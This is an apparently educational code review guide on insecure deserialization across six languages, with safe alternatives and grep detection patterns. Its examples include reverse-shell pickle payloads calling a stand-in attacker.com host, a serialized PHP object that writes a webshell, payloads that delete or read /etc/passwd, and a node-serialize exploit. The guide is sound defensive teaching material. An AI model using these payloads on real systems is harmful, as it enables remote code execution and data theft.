Insecure Deserialization: Code Review Guide
Table of Contents
1. Introduction to Insecure Deserialization
Insecure deserialization occurs when an application deserializes (reconstructs objects from) data that an attacker has tampered with. Serialization converts in-memory objects into a byte stream for storage or transmission; deserialization reverses this. When the serialized data comes from an untrusted source, the deserialization process can instantiate arbitrary objects and trigger magic methods (constructors, destructors, hooks) that execute attacker-controlled code.
Why This Matters
Insecure deserialization was ranked in the OWASP Top 10 (A8:2017) and merged into "Software and Data Integrity Failures" (A08:2021). It consistently leads to Remote Code Execution — the most critical impact. The vulnerability is language-agnostic: Java, Python, PHP, .NET, Ruby, and even Node.js all have dangerous deserialization patterns. Some of the largest breaches in history (Equifax, PayPal) involved deserialization attacks.
In this guide, you'll learn how serialization/deserialization works and why it's dangerous, specific exploitation techniques for Java, Python, PHP, Node.js, .NET, and Ruby, what gadget chains are and how they achieve RCE, how to identify dangerous deserialization patterns during code review, and how to prevent deserialization attacks with safe alternatives.
Insecure Deserialization Attack Flow
By Language
Why is JSON.parse() generally safe while pickle.loads() and Java's ObjectInputStream are dangerous?
2. How Deserialization Attacks Work
The attack follows a consistent pattern across all languages: (1) The application serializes objects and exposes them to the client (cookies, API responses, message queues). (2) The attacker modifies the serialized data to reference dangerous classes. (3) The application deserializes the modified data, instantiating attacker-chosen objects. (4) Magic methods on those objects execute during deserialization, running attacker code.
Magic methods are special methods that the language runtime calls automatically during object lifecycle events. In serialization attacks, the key magic methods are:
Magic Methods Triggered During Deserialization
| Language | Method | When Called | Danger |
|---|---|---|---|
| Java | readObject() | When ObjectInputStream reconstructs the object | Can execute arbitrary code if the class implements readObject() |
| Java | readResolve() | After readObject() to resolve object references | Can substitute a different object |
| Python | __reduce__() | Returns a callable + args that pickle uses to reconstruct | Directly specifies what function to call — trivial RCE |
| Python | __setstate__() | Called to restore object state after creation | Can execute code during state restoration |
| PHP | __wakeup() | Called immediately when unserialize() creates the object | Common in gadget chains that trigger further actions |
| PHP | __destruct() | Called when the object is garbage collected | Deferred execution — even if __wakeup is restricted |
| .NET | OnDeserialized() | Callback after deserialization completes | Executes attacker logic post-deserialization |
| Ruby | marshal_load() | Called to restore object from marshaled data | Can execute arbitrary code during load |
Simplest deserialization attack: Python pickle
1import pickle
2import os
3
4# Legitimate serialized data (a simple dictionary):
5safe_data = pickle.dumps({"user": "alice", "role": "viewer"})
6# b'\x80\x05\x95...'
7
8# Attacker crafts a malicious class:
9class Exploit:
10 def __reduce__(self):
11 # __reduce__ tells pickle HOW to reconstruct this object
12 # It returns: (callable, args)
13 # pickle will call: os.system("id")
14 return (os.system, ("id",))
15
16malicious_data = pickle.dumps(Exploit())
17
18# Application deserializes untrusted data:
19result = pickle.loads(malicious_data)
20# → Executes "id" command on the server!
21# uid=1000(webapp) gid=1000(webapp)
22
23# The attacker never needed to know what the original data looked like.
24# They just need pickle.loads() to process their crafted bytes.An application receives serialized objects via cookies. A developer adds HMAC signature verification before deserialization. Is this sufficient?
3. Java Deserialization
Java deserialization is the most extensively researched and exploited deserialization vulnerability class. Java's ObjectInputStream can instantiate any serializable class on the classpath, and the rich Java library ecosystem provides abundant "gadget chains" — sequences of classes whose methods chain together to achieve code execution.
Vulnerable: Deserializing untrusted Java objects
1// ❌ VULNERABLE: Deserializing user-controlled data
2import java.io.*;
3
4public class UserSessionHandler {
5
6 // Receives serialized session from cookie or API body
7 public UserSession loadSession(byte[] data) throws Exception {
8 ByteArrayInputStream bis = new ByteArrayInputStream(data);
9 ObjectInputStream ois = new ObjectInputStream(bis);
10
11 // This single line can execute ARBITRARY CODE
12 // if the attacker controls the byte[] data!
13 Object obj = ois.readObject(); // ← RCE happens HERE
14
15 return (UserSession) obj; // Cast happens AFTER deserialization
16 // Even if the cast fails, the damage is already done —
17 // malicious readObject() methods have already executed
18 }
19}
20
21// The cast to UserSession is NOT a security check!
22// By the time Java tries the cast, ObjectInputStream has already:
23// 1. Parsed the serialized bytes
24// 2. Instantiated the attacker's chosen classes
25// 3. Called readObject() on each — executing malicious codeJava serialized data is identifiable by its magic bytes: AC ED 00 05 (hex) or rO0AB (Base64-encoded). During code review, search for these signatures in cookies, HTTP headers, API bodies, and message queues.
Where Java deserialization appears in applications
1// Common Java deserialization surfaces:
2
3// 1. HTTP cookies or parameters (Base64-encoded)
4String sessionData = request.getCookie("session").getValue();
5byte[] decoded = Base64.getDecoder().decode(sessionData);
6ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decoded));
7Object session = ois.readObject(); // ❌ RCE
8
9// 2. JMX (Java Management Extensions) — often exposed on internal ports
10// Remote JMX uses ObjectInputStream internally
11
12// 3. RMI (Remote Method Invocation) — inter-service communication
13// RMI protocol uses Java serialization by default
14
15// 4. Message queues (ActiveMQ, RabbitMQ with Java serialization)
16ObjectMessage msg = (ObjectMessage) consumer.receive();
17Object payload = msg.getObject(); // ❌ RCE
18
19// 5. ViewState in JSF (JavaServer Faces)
20// Encrypted/signed ViewState can be attacked if the key is known
21
22// 6. Spring Session with Java serialization
23// Spring can serialize session data to Redis/database using ObjectInputStreamThe Gadget Chain Concept
The attacker doesn't need to find a custom vulnerable class. They chain together methods from common libraries already on the classpath (Apache Commons Collections, Spring, Hibernate). A "gadget chain" is a sequence like: Apache Commons Collections InvokerTransformer → calls Runtime.exec(). Tools like ysoserial generate payloads for dozens of known gadget chains across popular Java libraries.
You find ObjectInputStream.readObject() in your codebase. The developer says it's safe because the application only serializes UserSession objects. What's wrong with this argument?
4. Python pickle & PyYAML
Python's pickle module is explicitly documented as unsafe: "Warning: The pickle module is not secure. Only unpickle data you trust." Despite this, pickle is widely used for caching, session storage, ML model serialization, and inter-process communication.
Python pickle: Multiple RCE techniques
1import pickle, os
2
3# Technique 1: __reduce__ method (most common)
4class RCE1:
5 def __reduce__(self):
6 return (os.system, ("id",))
7
8# Technique 2: Reverse shell via __reduce__
9class RCE2:
10 def __reduce__(self):
11 import subprocess
12 return (subprocess.call, (["/bin/bash", "-c",
13 "bash -i >& /dev/tcp/attacker.com/4444 0>&1"],))
14
15# Technique 3: Arbitrary code via exec
16class RCE3:
17 def __reduce__(self):
18 return (exec, ("import socket,subprocess,os;"
19 "s=socket.socket();"
20 "s.connect(('attacker.com',4444));"
21 "os.dup2(s.fileno(),0);"
22 "os.dup2(s.fileno(),1);"
23 "os.dup2(s.fileno(),2);"
24 "subprocess.call(['/bin/sh','-i'])",))
25
26# Technique 4: Using eval (shorter payload)
27class RCE4:
28 def __reduce__(self):
29 return (eval, ("__import__('os').system('id')",))
30
31# Any of these, when serialized and deserialized:
32payload = pickle.dumps(RCE1())
33pickle.loads(payload) # → Executes "id" on the serverPyYAML: YAML deserialization RCE
1import yaml
2
3# ❌ VULNERABLE: yaml.load() with full Loader
4# PyYAML can instantiate Python objects via YAML tags
5
6malicious_yaml = """
7!!python/object/apply:os.system
8 args: ['id']
9"""
10
11# yaml.load(malicious_yaml, Loader=yaml.FullLoader) # RCE in older PyYAML
12yaml.load(malicious_yaml, Loader=yaml.UnsafeLoader) # Explicit unsafe
13
14# Other YAML RCE payloads:
15# !!python/object/new:subprocess.check_output [['id']]
16# !!python/object/apply:subprocess.Popen
17# - ['cat', '/etc/passwd']
18
19# ✅ SAFE: Always use yaml.safe_load()
20data = yaml.safe_load(user_input) # Only creates basic Python typesWhere Pickle Appears in Codebases
During code review, search for these pickle usage patterns: pickle.loads() on data from HTTP requests, cookies, or database fields. shelve module (uses pickle internally). joblib.load() for ML model loading. torch.load() for PyTorch models (uses pickle). Redis/Memcached session storage with pickle serialization. Celery task arguments serialized with pickle. pandas.read_pickle() for DataFrame serialization.
5. PHP unserialize()
PHP's unserialize() is one of the most commonly exploited deserialization functions in web applications. PHP serialized data is human-readable (e.g., O:4:"User":1:{s:4:"name";s:5:"alice";}), making it easy for attackers to craft payloads.
PHP unserialize: Exploitation via __wakeup and __destruct
1// PHP serialized format is text-based and readable:
2// O:4:"User":1:{s:4:"name";s:5:"alice";}
3// O = Object, 4 = class name length, "User" = class name
4// 1 = number of properties, s:4:"name" = string property name
5// s:5:"alice" = string property value
6
7// ❌ VULNERABLE: Deserializing user-controlled data
8$data = unserialize($_COOKIE['session']);
9
10// Attacker exploits PHP magic methods:
11// __wakeup() — called when object is unserialized
12// __destruct() — called when object is destroyed (garbage collection)
13// __toString() — called when object is used as string
14
15// Example: File deletion via __destruct
16class CacheFile {
17 public $filename;
18 public function __destruct() {
19 // Cleanup: delete cache file when object is destroyed
20 unlink($this->filename); // ← Attacker controls $filename!
21 }
22}
23
24// Attacker sends cookie with:
25// O:9:"CacheFile":1:{s:8:"filename";s:11:"/etc/passwd";}
26// When the object is garbage collected, __destruct() deletes /etc/passwd!
27
28// For RCE, chain through classes that call eval(), system(), exec(), etc.
29class Logger {
30 public $logFile;
31 public $logData;
32 public function __destruct() {
33 file_put_contents($this->logFile, $this->logData);
34 }
35}
36// Attacker writes a PHP webshell:
37// O:6:"Logger":2:{s:7:"logFile";s:14:"/var/www/s.php";s:7:"logData";s:29:"<?php system($_GET['cmd']); ?>";}Where PHP unserialize appears
1// ❌ Common vulnerable patterns in PHP applications:
2
3// 1. Session data in cookies
4$session = unserialize(base64_decode($_COOKIE['session']));
5
6// 2. User preferences
7$prefs = unserialize($row['preferences']); // From database
8
9// 3. Cached objects
10$cached = unserialize(file_get_contents($cacheFile));
11
12// 4. API parameters
13$data = unserialize($_POST['data']);
14
15// 5. WordPress serialized options
16$options = unserialize(get_option('my_plugin_settings'));
17
18// ✅ SAFE alternatives:
19$data = json_decode($input, true); // Use JSON instead
20// Or restrict allowed classes (PHP 7+):
21$data = unserialize($input, ['allowed_classes' => ['User', 'Settings']]);A PHP application uses unserialize() on data from the database, not directly from user input. Is this safe?
6. Node.js & YAML Deserialization
Node.js doesn't have a built-in native serialization format like Java or Python. However, several npm packages provide serialization that can lead to RCE, and YAML parsing across all languages can be dangerous.
node-serialize: RCE via IIFE in serialized functions
1// The "node-serialize" package can serialize/deserialize functions
2// ❌ This package has a known RCE vulnerability (CVE-2017-5941)
3
4const serialize = require('node-serialize');
5
6// Attacker crafts a payload with an immediately-invoked function:
7const payload = '{"exploit":"_$$ND_FUNC$$_function(){require(\'child_process\').execSync(\'id\')}()"}';
8
9// When deserialized, the function is reconstructed AND executed:
10serialize.unserialize(payload);
11// → Executes "id" on the server!
12
13// The _$$ND_FUNC$$_ marker tells node-serialize to treat the value
14// as a function. The trailing () makes it an IIFE — executed immediately.js-yaml and other YAML parsers
1// js-yaml (Node.js) — older versions had dangerous defaults
2const yaml = require('js-yaml');
3
4// ❌ VULNERABLE (older js-yaml with DEFAULT_FULL_SCHEMA):
5const data = yaml.load(userInput, { schema: yaml.DEFAULT_FULL_SCHEMA });
6// Custom YAML tags could instantiate JavaScript objects
7
8// ✅ SAFE: Modern js-yaml defaults to safe schema
9const data = yaml.load(userInput); // Safe by default since js-yaml 4.x
10
11// ✅ SAFE: Explicitly use safe load
12const data = yaml.load(userInput, { schema: yaml.DEFAULT_SAFE_SCHEMA });
13
14// General rule across all languages:
15// - Python: yaml.safe_load() ✅, yaml.load(Loader=FullLoader) ❌
16// - Ruby: YAML.safe_load() ✅, YAML.load() ❌ (Ruby < 3.1)
17// - Java (SnakeYAML): new Yaml(new SafeConstructor()) ✅, new Yaml() ❌Other Dangerous Node.js Patterns
Beyond dedicated serialization libraries, watch for these Node.js patterns: eval() or new Function() on serialized/stored data. vm.runInNewContext() with user-controlled code (sandbox escapes exist). MongoDB query injection via $where (executes JavaScript server-side). Redis EVAL with user-controlled Lua scripts.
7. Detection During Code Review
Deserialization vulnerabilities follow language-specific patterns. During code review, systematically search for deserialization functions that process untrusted data.
Deserialization Detection by Language
| Language | Dangerous Functions | Magic Bytes / Signatures | Safe Alternative |
|---|---|---|---|
| Java | ObjectInputStream.readObject(), readUnshared(), XMLDecoder.readObject() | AC ED 00 05 (hex), rO0AB (Base64) | JSON (Jackson/Gson), Protocol Buffers |
| Python | pickle.loads(), shelve.open(), joblib.load(), torch.load() | \x80\x05\x95 (pickle protocol 5) | json.loads(), yaml.safe_load() |
| PHP | unserialize() | O:, a:, s:, i: prefixes (text-based) | json_decode(), allowed_classes option |
| Node.js | node-serialize.unserialize(), cryo.parse() | _$$ND_FUNC$$_ marker | JSON.parse() (always safe) |
| .NET | BinaryFormatter.Deserialize(), ObjectStateFormatter, LosFormatter | 00 01 00 00 00 FF FF FF FF | System.Text.Json, protobuf-net |
| Ruby | Marshal.load(), YAML.load() (< 3.1) | \x04\x08 (Marshal magic) | JSON.parse(), YAML.safe_load() |
| YAML (all) | yaml.load() (Python), YAML.load (Ruby), Yaml() (Java SnakeYAML) | !!python/object, !!ruby/object tags | safe_load(), SafeConstructor |
Quick grep patterns for deserialization
1# Java
2grep -rn "ObjectInputStream|readObject()|readUnshared()|XMLDecoder|XStream" --include="*.java"
3
4# Python
5grep -rn "pickle\.loads|pickle\.load|shelve\.|joblib\.load|torch\.load|yaml\.load|yaml\.full_load" --include="*.py"
6
7# PHP
8grep -rn "unserialize(" --include="*.php"
9
10# Node.js
11grep -rn "unserialize|deserialize|node-serialize|cryo" --include="*.js" --include="*.ts"
12
13# .NET
14grep -rn "BinaryFormatter|ObjectStateFormatter|NetDataContractSerializer|LosFormatter|SoapFormatter" --include="*.cs"
15
16# Ruby
17grep -rn "Marshal\.load|YAML\.load[^_]" --include="*.rb"
18
19# Check for Java serialized data in cookies/tokens
20grep -rn "rO0AB|ACED0005|base64.*decode.*readObject" --include="*.java" --include="*.xml" --include="*.properties"You find this in a Python Flask application: session_data = pickle.loads(redis.get(session_id)). The developer says Redis is internal and trusted. Should you flag this?